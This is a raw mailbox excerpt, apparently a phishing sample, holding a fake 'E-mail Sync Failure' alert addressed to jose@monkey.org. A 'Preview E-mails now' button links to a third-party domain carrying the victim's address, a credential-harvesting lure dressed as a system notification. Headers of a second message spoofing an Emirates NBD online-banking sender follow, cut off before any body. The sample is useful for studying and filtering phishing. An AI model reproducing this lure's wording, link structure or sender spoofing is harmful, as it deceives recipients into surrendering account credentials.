From: "E-mail Security Alert" <>
Date: Fri, 02 Aug 2019 11:16:35 +0800
Message-Id: <20190802031636.C3C20570D0C@mail.wponline.hu>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 145

You will not see this in a MIME-aware mail reader.
--===============0163329546==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

     jose@monkey.org E-mail Sync Failure.  E-mail Sync for your E-mailbox h=
as failed and you have [9] pending messages on the mail queue.
 Follow the steps below to download pending emails and  continue to receive=
 emails on your jose@monkey.org account.
 =


 Preview E-mails now =

 Note:This system notification isn't an email message and you can't reply t=
o it.. 2019  =A9 Email Admin.
--===============0163329546==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P> </P>
<DIV class=3D"m_-4510230204592229264m_-528562578290824683m_-907485169216214=
0054gmail-_2zOpJb7ZbCN0X1DoeFyiYw m_-4510230204592229264m_-5285625782908246=
83m_-9074851692162140054gmail-JWNdg1hee9_Rz6bIGvG1c m_-4510230204592229264m=
_-528562578290824683m_-9074851692162140054gmail-allowTextSelection">
<DIV>
<DIV class=3Dm_-4510230204592229264m_-528562578290824683m_-9074851692162140=
054gmail-rps_6344>
<DIV>
<DIV style=3D'FONT-SIZE: 30px; FONT-FAMILY: Boing-Bold,"Arial Black",sans-s=
erif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFOR=
M: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33); PADDING-BOTTOM: 10px; FONT=
-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255);=
 TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: norma=
l; text-decoration-style: initial; text-decoration-color: initial'><SPAN st=
yle=3D"COLOR: rgb(0,0,255)"><FONT size=3D5>jose@monkey.org E-mail Sync Fail=
ure.</FONT></SPAN></DIV>
<DIV style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","=
Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33=
); FONT-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,25=
5,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps=
: normal; text-decoration-style: initial; text-decoration-color: initial'>
<P>E-mail Sync for your E-mailbox has failed and you have [9] pending messa=
ges on the mail queue.</P>
<P>Follow the steps below to download pending emails and&nbsp; continue to =
receive emails on your jose@monkey.org account.</P>
<P><BR></P>
<DIV style=3D'FONT-SIZE: 15px; MAX-WIDTH: 200px; FONT-FAMILY: wf_segoe-ui_n=
ormal,"Segoe UI","Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-=
SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; C=
OLOR: rgb(33,33,33); PADDING-BOTTOM: 10px; FONT-STYLE: normal; TEXT-ALIGN: =
center; PADDING-TOP: 10px; PADDING-LEFT: 10px; LETTER-SPACING: normal; PADD=
ING-RIGHT: 10px; BACKGROUND-COLOR: rgb(0,120,215); TEXT-INDENT: 0px; font-v=
ariant-ligatures: normal; font-variant-caps: normal; text-decoration-style:=
 initial; text-decoration-color: initial'><A style=3D'TEXT-DECORATION: none=
; FONT-FAMILY: Boing-Bold,"Arial Black",sans-serif; COLOR: white' href=3D"h=
ttps://mail.facesplussalon.com//Godaddy/ii/?email=3Djose@monkey.org" rel=3D=
"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"https://www.g=
oogle.com/url?q=3Dhttp://mail.facesplussalon.com//Directs/ii/?email%3D25&am=
p;source=3Dgmail&amp;ust=3D1564751290046000&amp;usg=3DAFQjCNEX7VYjJybdia1cc=
nSKPd9LgCSpxQ">Preview E-mails now</A></DIV></DIV>
<DIV style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","=
Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33=
); PADDING-BOTTOM: 10px; FONT-STYLE: normal; LETTER-SPACING: normal; BACKGR=
OUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: nor=
mal; font-variant-caps: normal; text-decoration-style: initial; text-decora=
tion-color: initial'><B><BR></B></DIV>
<DIV style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","=
Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33=
); PADDING-BOTTOM: 10px; FONT-STYLE: normal; LETTER-SPACING: normal; BACKGR=
OUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: nor=
mal; font-variant-caps: normal; text-decoration-style: initial; text-decora=
tion-color: initial'><B>Note:</B><I>This system notification isn't an email=
 message and you can't reply to it..</I></DIV>
<DIV style=3D'FONT-SIZE: 15px; FONT-FAMILY: wf_segoe-ui_normal,"Segoe UI","=
Segoe WP",Tahoma,Arial,sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33=
); PADDING-BOTTOM: 10px; FONT-STYLE: normal; LETTER-SPACING: normal; BACKGR=
OUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: nor=
mal; font-variant-caps: normal; text-decoration-style: initial; text-decora=
tion-color: initial'>2019&nbsp; =C2=A9 Email Admin.</DIV></DIV></DIV></DIV>=
</DIV></BODY></HTML>
--===============0163329546==--

From jose@monkey.org Sun Aug  4 17:55:05 2019 +0000
Return-Path: onlinebanking@emiratesnbd.com
Delivered-To: jose@monkey.org
X-FDA: 75785496570.21.bear75_2c5699cdd5c60
X-Spam-Summary: 50,0,0,9825ae866852b97a,d41d8cd98f00b204,onlinebanking@emiratesnbd.com,:,RULES_HIT:41:72:355:375:379:495:560:800:962:967:973:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1534:1541:1559:1571:1588:1589:1593:1594:1711:1714:1730:1747:1777:1792:2198:2199:2393:2525:2553:2560:2563:2682:2685:2828:2859:2890:2909:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3867:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4552:5007:6261:6669:6674:6678:7628:7801:8603:8957:9025:9040:9873:10004:10346:11473:11657:11658:11914:12043:12297:12555:12740:12895:12903:12955:12958:12986:13139:13311:13357:13374:13439:14093:14096:14181:14384:14721:14777:14827:18000:21080:21212:21433:21450:21451:21483:21524:21627:21810:21819:30001:30016:30022:30054:30070,0,RBL:157.230.149.247:@emiratesnbd.com:.lbl8.mailshell.net-62.4.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,
X-HE-Tag: bear75_2c5699cdd5c60
X-Filterd-Recvd-Size: 2275
Received: from uo-02.untuddh.com (unknown [157.230.149.247])
	by imf11.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun,  4 Aug 2019 17:55:04 +0000 (UTC)
Received: from emiratesnbd.com (unknown [216.170.112.151])
	by uo-02.untuddh.com (Postfix) with ESMTP id 646896A704
	for <jose@monkey.org>; Sun,  4 Aug 2019 17:12:39 +0000 (UTC)
